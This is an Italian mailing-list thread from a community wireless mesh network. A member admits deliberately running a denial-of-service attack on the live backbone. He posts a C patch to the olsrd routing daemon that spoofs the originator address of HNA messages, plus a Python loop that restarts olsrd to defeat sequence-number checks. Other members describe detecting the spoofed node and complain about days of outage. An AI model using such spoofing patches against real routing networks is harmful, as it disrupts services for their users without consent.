[Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

Alessandro Gnagni alessandro a gnagni.it
Dom 25 Maggio 2014 07:07:47 UTC


Non è qualche ora. Va avanti da giovedì mattina.
Ma almeno avvisare? Uno non può perdere tempo appresso a ste cose...
Jabber è stato ko da giovedì per sta cosa.
Il 25/mag/2014 01:03 "Saverio Proto" <zioproto a gmail.com> ha scritto:

> Ciao,
>
> Metto in Cc: anche wireless a ml.ninux.org perché questa email contiene
> informazioni tecniche interessanti.
>
> bravi, avete risolto il problema in fretta :) Ho volutamente provato
> un attacco DoS sul backbone per capire che effetto poteva avere.
>
> ecco la patch di olsrd con cui generavo l'attacco DoS
>
> diff --git a/src/build_msg.c b/src/build_msg.c
> index 109f955..e252981 100644
> --- a/src/build_msg.c
> +++ b/src/build_msg.c
> @@ -1021,7 +1021,11 @@ serialize_hna4(struct interface *ifp)
>    m = (union olsr_message *)msg_buffer;
>
>    /* Fill header */
> -  m->v4.originator = olsr_cnf->main_addr.v4.s_addr;
> +  struct in_addr fakesource;
> +  fakesource.s_addr = 0;
> +  //inet_hton(2956867021,&fakesource);
> +  inet_aton("172.16.40.40",&fakesource);
> +  m->v4.originator = fakesource.s_addr;
>    m->v4.hopcnt = 0;
>    m->v4.ttl = MAX_TTL;
>    m->v4.olsr_msgtype = HNA_MESSAGE;
>
>
> una domanda,
>
> se avessi patchato anche:
>
> m->v4.hopcnt = XXX
>
> mettendo numeri casuali..
>
> sarebbe stato altrettanto facile capire chi è che iniettava questi
> messaggi ?
>
> mi sto divertendo parecchio con questi attacchi DoS, sono molto
> istruttivi. Per chi vuole giocare insieme a me a programmare in C
> possiamo approfondire il giovedi sera al Sans Papiers. (Il prossimo
> che vorrei provare è DrDoS su snmp).
>
> un problema di questo attacco sono cmq i sequence number. Per rendere
> l'attacco efficace ho dovuto far andare la mia instanza patchata di
> OLSR a singhiozzo:
>
> import os
> import time
>
> while True:
>         os.system("olsrd")
>         print "started\n"
>         time.sleep(120)
>         os.system("killall olsrd")
>         print "killed\n"
>         time.sleep(300)
>
> in quanto avevo bisogno che i miei sequence number dovevano sempre
> essere piu bassi di quelli del spoofato, altrimenti venivano scartati
> come out of sequence.
>
> vi va di scrivere insieme un articoletto per il blog ? Io scrivo la
> parte di come ti costruisce l'attacco e voi la parte di come avete
> fatto ad identificare il nodo spoofato ?
>
> ho staccatto il nodo attaccante, il gioco è finito :)
>
> ah... vi prego nessun malumore per qualche oretta di disservizi, this
> is Ninux. Si fanno queste cose perché ci si diverte insieme.
>
> ciao :)
>
> Saverio
>
> Il 24 maggio 2014 23:23, Andrea Pescetelli
> <andrea.pescetelli a gmail.com> ha scritto:
> > Saverio,
> > Abbiamo rilevato che dal nodo Gallia viene generato un messaggio olsr hna
> > con originator 172.16.40.40, validity time 570, hna 176.62.53.192/28
> > proveniente dal nodo in oggetto.
> >
> > Questo problema sta oscurando diversi servizi di ninux in farm
> appartenenti
> > a quella subnet.
> >
> > Abbiamo triangolato la posizione basandoci sugli hop count dei cammini
> > multipli.
> > puoi verificare?
> >
> > Grazie
> >
> > Fish, Hispanico, Halino
> > --
> > Andrea Pescetelli aka Fish
> > Skype: andrea5742
> > Ninux int: 5001/5002
> > Mobile: +39 3891156050
> >
> >
> >
> >
>
-------------- parte successiva --------------
Un allegato HTML è stato rimosso...
URL: <http://ml.ninux.org/pipermail/wireless/attachments/20140525/c35f63be/attachment.htm>


Maggiori informazioni sulla lista Wireless